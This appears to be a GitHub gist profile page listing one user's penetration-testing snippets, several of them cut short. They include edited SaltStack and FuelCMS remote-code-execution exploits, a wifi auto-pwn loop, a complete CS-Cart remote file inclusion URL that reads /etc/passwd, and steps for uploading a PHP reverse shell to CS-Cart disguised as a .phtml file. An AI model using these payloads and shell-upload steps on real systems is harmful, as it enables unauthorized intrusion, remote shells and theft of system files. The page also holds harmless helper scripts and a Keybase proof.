Moamen Basel momenbasel

💭
👨‍💻👨‍💻
View GitHub Profile
@momenbasel
momenbasel / gist:149eec9d8004e10414f68454decec538
Created November 18, 2022 20:33
script for reading a Burp Suite scope file and extracting the URLs
#!/usr/bin/python3
#script for reading burpsuite scope and extract the urls
#requirements
#python3 -m pip install -U find_domains iplookup python-whois
#or pip3 install -r requirements.txt
@momenbasel
momenbasel / ip_list.py
Created October 24, 2022 08:57
get IPs from a CIDR file
from netaddr import IPNetwork
import socket
from contextlib import closing
ips = open("ips.txt", "r")  # insert the IP/CIDR file name here
ip_arr = ips.read().strip().split('\n')
@momenbasel
momenbasel / pwning with PI
Last active February 26, 2021 18:52
infiniteScript.py
#!/bin/python2.7
import subprocess
import time
while True:
    proc = subprocess.Popen('./wifi-autopwner.sh', stdin=subprocess.PIPE)
    proc.communicate("71")
    time.sleep(720000)
@momenbasel
momenbasel / saltstack.py
Created October 2, 2020 13:48
edited Saltstack 3000.1 - Remote Code Execution
# Exploit Title: Saltstack 3000.1 - Remote Code Execution
# Date: 2020-05-04
#edited: 2020-10-02
#the edit: instead of testing locally --first--, making it testing remotely
# Exploit Author: Jasper Lievisse Adriaanse
# Vendor Homepage: https://www.saltstack.com/
# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
# Tested on: Debian 10 with Salt 2019.2.0
# CVE : CVE-2020-11651 and CVE-2020-11652
# Description: Saltstack authentication bypass/remote code execution
@momenbasel
momenbasel / thm-OneLiner.js
Created September 23, 2020 17:38
Adds 1 hour on THM automatically, so you can hack peacefully without worrying about the machine expiring.
setInterval(function(){addHour(); console.log(" : <= Added '1 Hour' times! \n"); }, 3600000);
// adds one hour every hour (3600000 ms)
@momenbasel
momenbasel / rce.phtml
Created September 23, 2020 15:48
CS-Cart authenticated RCE
get PHP shells from http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!
@momenbasel
momenbasel / gist:a683e991c8758e62704a28a2b90f087e
Created September 23, 2020 15:22
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example:
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
@momenbasel
momenbasel / tp.sh
Last active April 3, 2024 22:47
tp-link Tl-wn722n v2/v3 monitoring && packet injection. atheros ar9271
apt update -y && apt upgrade -y && apt dist-upgrade
sudo apt-get install linux-headers-$(uname -r) -y
sudo apt install bc -y
sudo rmmod r8188eu
git clone https://github.com/aircrack-ng/rtl8188eus
cd rtl8188eus
sudo -i
echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf"
exit
make
@momenbasel
momenbasel / fuel.py
Created September 18, 2020 21:08
python3 edited fuelCMS 1.4.1 exploit (https://www.exploit-db.com/exploits/47138) 2018-16763
#!/bin/python3
import requests
import urllib
url = "http://rhost/"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
### Keybase proof
I hereby claim:
* I am momenbasel on github.
* I am momenbasel (https://keybase.io/momenbasel) on keybase.
* I have a public key ASDSSlAYzNrBAGr2Rxh2xaRlZXUIZ3B2aMqyoeoQIvVFoQo
To claim this, I am signing this object: